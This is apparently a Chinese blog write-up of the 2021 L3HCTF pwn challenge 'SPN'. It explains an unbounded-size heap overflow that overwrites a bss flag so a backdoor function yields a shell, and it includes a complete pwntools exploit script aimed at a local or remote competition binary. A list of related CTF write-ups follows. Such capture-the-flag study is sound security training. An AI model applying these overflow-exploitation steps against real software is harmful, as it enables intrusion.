2021 L3HCTF pwn SPN

最新推荐文章于 2025-07-24 10:45:42 发布
原创 最新推荐文章于 2025-07-24 10:45:42 发布 · 418 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

本文分析了SPN_ENC程序中存在的一处堆溢出漏洞,详细介绍了通过不受限制的大小参数实现任意内存覆盖的过程,利用此漏洞绕过后门函数的安全检查,最终达到控制程序的目的。

在这里插入图片描述
保护没开canary… 不知道啥意思

首先add这里就有问题
在这里插入图片描述size也没范围
index因为限制了v3,v5不能为负,也没范围。

如果能是负数直接数组越界这题也就解决了。

再然后出大问题的是edit
在这里插入图片描述
首先给了100字节的堆溢出
再然后看下面那个memcpy,因为我们前面没有限制size的大小,所以我们这里可以任意覆盖bss上TEMPBUF下面的变量

后门函数要求shell等于0.
shell这变量
在这里插入图片描述

在这里插入图片描述
显然就在TEMPBUF下面,我们直接盖过去就可以了。
在这里插入图片描述
重点要注意的是我们申请的chunk的序号要写大一点,不然会被复制过来的盖住,导致后面memcpy出错。

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

pc = "./SPN_ENC"

local = 1
if local:
    r = process(pc)
    elf = ELF(pc)
    libc = elf.libc
    
else:
    r = remote("81.69.230.99",9003)
    elf = ELF(pc)
    libc = ELF("./libc-2.27.so")

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))

def db():
    gdb.attach(r)
    pause()

def dbs(src):
    gdb.attach(r, src)

def add(size, index):
    sla("0.exit\n", "1")
    sla("Size:\n", str(size))
    sla("Index:\n", str(index))

def edit(size,index,content):
    sla("0.exit\n", "2")
    sla("Index:\n", str(index))
    sla("Size\n", str(size))
    sa('Content', content)

def backdoor():
    sla("0.exit\n", "5")

add(0x1100, 200)
#db()
edit(0x1100, 200, '\x00' * 0x1100)

backdoor()

ti()
[2021XCTF]L3HCTF-Writeup(Web)
Y4tacker的博客
11-16 3308
文章目录写在前面WebImage Service 1Image Service 2Easy PHPbypass绕过方法一绕过方法二绕过方法Ncover 写在前面 这周刚好比较空就抽了点时间打了下,质量挺高的还是 Web Image Service 1 注册个账号,发现密码不能是admin 进去可以上传图片 flag在admin账户上传的图片中 源码都被编译了 感觉在任何地方输入admin 都会被ban, 伪造header也都不行 f12我查看源码的时候发现居然是支持表单提交 不会逆向go,那无源码情况
l3hctf2024 pwn treasure_hunter
qq_62172019的博客
02-07 617
可以看到上面的大块可以覆盖到0x20小块的数据区,正好这个小块存放着hashmap的pairs指针我们只需要覆盖其低地址并且在可控制的块伪造pairs和修改一些关键字符(dream操作)就可以完成伪造,伪造之后就可以实现将任意的key放在hashmap中从而实现任意读任意写。我刚才提到了" 修改关键字符 ",如上图在hashmap每插入一对pair的时候都会产生一个字符用于标识key,所以我们只需要搞明白字符是怎么来的和字符应该放在哪里。上图我也写了注释,v8就是我们要确定的字符。成功getshell。
L3H CTF
热门推荐
qq_51584770的博客
11-15 1万+
Easy PHP 思路:当把这段代码复制到本地的时候,发现源码长得很奇怪 if ("admin" == $_GET[username] &‮⁦+!!⁩⁦& "‮⁦CTF⁩⁦l3hctf" == $_GET[‮⁦L3H⁩⁦password]) { //Welcome to include "flag.php"; echo $flag; } 想到用url编码的方式,将源码进行编码 得到: if(“admin”==$_GET[username]&%E2%80%
【Web】L3HCTF2025 wp
最新发布
uuzeray的博客
07-24 1283
显然,最终利用点在render_template_string的SSTI,而/ip_detail/username这个路由是去访问/get_last_ip/username,将获取的res.text进行模板渲染。用x_gateway_start和x_gateway_length截取/proc/self/mem,成功读到flag。而/get_last_ip/username中可控的点是user.last_ip。在/proc/self/fd/6读到了加*的敏感数据。
2024 L3HCTF---Crypto---babySPN revenge
2202_75787160的博客
02-05 653
它是一个简化版的AES加密算法(具体为AES的Round 1部分)。简单来说就是hash_value 找出并且看出flag为hash_value加L3HCTF
L3HCTF 2021 | 大吉大利,全民夺旗!
Cyberpeace的博客
10-22 729
​​赛题攻关 战术竞技 带你深度体验网络攻防 组队开黑 策略为王 等你上演一场绝地求生! 第七届XCTF国际网络攻防联赛分站赛 L3HCTF 2021 2021年11月13日09:00-15日09:00 火力全开,等你来战! 本届L3HCTF是由XCTF联赛的合作单位L3H_Sec战队组织,由赛宁网安提供技术支持。作为第七届XCTF国际联赛的分站赛,本次比赛将采用在线网络安全夺旗挑战赛的形式,面向全球开放。 L3H_Sec战队首次作为出题战队参与赛事,赛题风格备受期待。据队长透露,赛题将侧重考察选手的综合
精选资源
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
精选资源
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
2021 ciscn 线上 pwn silverwolf
yongbaoii的博客
08-30 1121
显然是全绿。 add 只能控制一个chunk,size也有限制。 edit 以回车结束。 这里有一个off by null。 show 就输出。 free 有个uaf。 其实比起lonelywolf来说就是开了个沙箱。 整个看下来,那个index就是那种逗你玩那种。 然后libc当时给的是2.27,但是做半天发现是最新的2.27……里面更新了对那些tcache链表的那些检查,就挺离谱的,所以可以当成2.29来做。 那想想怎么来利用那个uaf。 uaf,在得到libc的条件下,我们可以直接攻击free_h.
2021东华杯pwn部分wp
eeeeeight的博客
11-01 1952
前言: 除了boom都蛮简单的, 第四个pwn因为boom做的有点久就没来得及, 看了眼感觉不难也就不想花时间再做了 cpp1: 由于change时std::cin的大小没有控制好, 所以cin可以输入很多字符, 导致了堆溢出, 且申请回来的时候没有手动清空fd位, 泄露了heap偏移, 得到了tcache结构体的地址, 利用堆溢出控制free块的fd就可以控制整个tcache结构体, 从而使得unsorted bin产生. 同上, 泄露libc偏移, 再利用fd写__free_hook与system, 再
2021L3HCTF luuuuua Writeup
qq_41866334的博客
11-15 5747
2021 L3HCTF luuuua Writeup AAA:immortal 这题做完以后感觉和ByteCTF2021的language binding很像,这是我之前写的Writeup 。 首先打开java层,发现asserts/res/test.lua里的逻辑是假的。然后通过LoginActivity里的afterTextChanged方法找到关键的b.c.a.b.a.d。 注意它 import org.keplerproject.luajava.LuaState; import org.ke
2021l3hctfwp_web
meteox的博客
11-15 3400
Image Service 1 给了源码但没完全给,服务是用gin写的,给的是编译后的文件,运行main后可知 运行app的main的时候由于没数据库报错了 以为下面的包名对应的链接给了源码,然而并不能访问到。。。 给了robot的源码 import requests import time import os os.chdir(os.path.dirname(os.path.abspath(__file__))) username = 'admin' password = os.e
pwn 入门基础
y0un9er
08-10 4963
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
HCTF2017-Web-Writeup
dengzhasong7076的博客
11-14 5768
boring website 先通过扫描得到: http://106.15.53.124:38324/www.zip <?php echo "Bob received a mission to write a login system on someone else's server, and he he only finished half of the work<br /...
L3HCTF bypass出题人视角
yzddMr6的博客
02-27 2951
@yzddmr6 自己在L3HCTF中出了一道java上传绕过题目bypass。其中题目中的一些trick不仅仅是用于CTF出题,对于实战渗透也是有一定的帮助。今天跟大家分享一下出题时的一些思考跟解题细节。 题目有三道过滤 1. 绕过后缀 public static String checkExt(String ext) { ext = ext.toLowerCase(); ...
L3HCTF2021几道简单的签到题
Hopeace的博客
11-25 1634
L3HCTF2021几道简单的签到题Misc WelcomeWeb Image1Web EasyPHP 作者:Hopeace Misc Welcome 第一次做misc的题目,迷迷糊糊的注册之后, 进去好像是个聊天室类似的东西 随便点点就找到了flag Web Image1 靶机地址:http://121.36.209.245:10001/ 附件下载地址:http://121.36.209.245:10001/static/deploy.zip 题目要求: Find flags in admin’s sha
XCTF-L3HCTF2021 DeepDarkFantasy write up
qq_42940521的博客
11-15 5130
XCTF-L3HCTF2021 DeepDarkFantasy write up DeepDarkFantasy 题目描述和hint如下 原始附件如下: 链接:https://pan.baidu.com/s/1Rs1A6viKUXuNvxExAvtvSQ 提取码:lqln 下载后得到一个pth文件,根据第一个提示,其被以简单异或的方式加密,遍历得到解密比特为0xde,此时可以发现PK头 解密后的文件如下: 链接:https://pan.baidu.com/s/1fTiS7DzQP_Rpv_fkB5Ct
2015第七届HCTF
liukenn的博客
12-07 1266
大三狗一只,第一次写blog,希望记录下自己从零开始的CTF之旅 两个彩笔第一次参见正式的CTF,写写只做出来的5道题#共三十几道题啊。。=。= 首先是全部题目的地址: https://www.zybuluo.com/lightless/note/183904
hctf[pwn] the-end
九层台
11-12 2166
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf(&quot;here is a gift %p, good luck ;)\n&quot;, &amp;a...
全国大学生信息安全竞赛2021 pwn题解压缩包
资源摘要信息:"ciscn_2021_pwny.zip是2021年全国大学生信息安全竞赛中的pwn(漏洞利用)题目的相关文件。Pwn是指在信息安全领域中的漏洞挖掘和利用(Exploitation)技能,特别是针对内存损坏漏洞的利用。pwn题目通常...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值